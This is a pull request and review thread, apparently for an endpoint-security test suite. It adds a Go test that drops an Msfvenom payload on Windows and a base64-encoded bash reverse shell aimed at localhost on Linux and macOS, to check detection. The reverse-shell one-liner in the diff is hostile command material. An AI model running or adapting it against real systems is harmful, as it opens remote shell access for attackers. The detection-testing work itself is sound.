### PR TITLE
Updates, also decided on cleaning up the payloads being used

### PR DESCRIPTION
**Pull request by gerbsec**
This test made use of a variety of offensive tools and techniques. It employed Msfvenom for Windows, a program that allows an attacker to develop payloads and malicious code to execute on devices. Msfvenom is extensively utilized by threat actors that don't have the skills to write custom malicious software. This code might be used to perform a variety of tasks, but for the purpose of the VST, we have it execute the "whoami" command to output the current user's username. Msfvenom has a signature and should be detected the moment it is dropped on disk. We used a somewhat different method for Linux and MacOS. We base64 encoded a relatively common yet powerful reverse shell payload. A reverse shell provides an attacker with command-line access that they would not otherwise have. To keep this test secure, we have it pointing to localhost. A user must manually execute this payload for it to operate; nonetheless, your endpoint should never let this to remain on disk.

### CODE REVIEW

**Comment by bfuzzy1** [comment]
Related: https://github.com/preludeorg/test/issues/23

File: tests/c521b330-70eb-4c4d-b748-a8869a7bac4c/c521b330-70eb-4c4d-b748-a8869a7bac4c.go [hunk 1]
```diff
@@ -0,0 +1,38 @@
...
+		if _, err := exec.Command("cmd.exe", mal).Output(); err != nil {
+			os.Exit(101)
+		} else {
+			os.Exit(100)
+		}
+	} else {
+		mal := "echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMSAwPiYxJw== | base64 -d | bash 2>/dev/null"
```
Comment (privateducky) [inline tests/c521b330-70eb-4c4d-b748-a8869a7bac4c/c521b330-70eb-4c4d-b748-a8869a7bac4c.go:23]: let's switch this to use the Endpoint.Run module function

**Comment by privateducky** [comment]
this tested on all the things?

**Comment by bfuzzy1** [comment]
> this tested on all the things?

Not quite done yet on this one. But I'm hitting 'exit status 1' on Darwin and Linux.

**Comment by bfuzzy1** [comment]
Was this meant to be embedded in "[RULE: Malicious files are quarantined](https://github.com/preludeorg/test/blob/master/tests/b74ad239-2ddd-4b1e-b608-8397a43c7c54/b74ad239-2ddd-4b1e-b608-8397a43c7c54.go)" @gerbsec ? 

If not should add "Endpoint.Quarantined" to this as I would expect this to get quarantined upon execution. It does get quarantined on Windows test builds on execution for example so we should account for that as a standalone.

**Comment by privateducky** [comment]
> Nope, this was meant to be picked up and the probe will mention if it was quarantined.

agreed. this falls into "probe responsibility" vs our other embed test, which extracts a separate file from the test itself. nuanced but I think rationale.

**Comment by bfuzzy1** [comment]
> > Nope, this was meant to be picked up and the probe will mention if it was quarantined.
> 
> agreed. this falls into "probe responsibility" vs our other embed test, which extracts a separate file from the test itself. nuanced but I think rationale.

Makes sense. This test fails with exit 1 on Linux and Nix using Endpoint.Run.

```
Darwin arm64 test failed
Windows 11 arm64 test passed
Fedora 36 arm64 test failed
Debian 11.3 arm64 test failed
Ubuntu 22.04 ARM64 test failed
Windows 11 x64 test passed
Windows 10 x64 test passed
Windows Server 2016 test passed
Windows Server 2019 test passed
Ubuntu 22.04 amd64 test failed
Ubuntu 22.10 amd64 test failed
```

**Comment by bfuzzy1** [comment]
I goof'd round of testing and misunderstood some things about the test on my end. This will be solved by the README's that will accompany each test in the future.

Re-tested this morning after double checking everything with @gerbsec : 

```
Darwin arm64 test passed
Windows 11 arm64 test passed
Fedora 36 arm64 test passed
Debian 11.3 arm64 test passed
Ubuntu 22.04 ARM64 test passed
Windows 11 x64 test passed
Windows 10 x64 test passed
Windows Server 2016 test passed
Windows Server 2019 test passed
Ubuntu 22.04 amd64 test passed
Ubuntu 22.10 amd64 test passed
```

**Comment by gerbsec** [comment]
> @bfuzzy1 @gerbsec what's the primary diff between this test and https://github.com/preludeorg/test/tree/master/tests/53ff0bda-537e-4493-90cf-220145d9569a, in terms of what we're testing against?
This is a malicious payload, that is meant to be picked up on write. It should not be able to get executed. The payload isn't obfuscated beyond the base64, but we can remove the b64 if you'd like. Both payloads are reverse shells.

**Pull request closed without merging**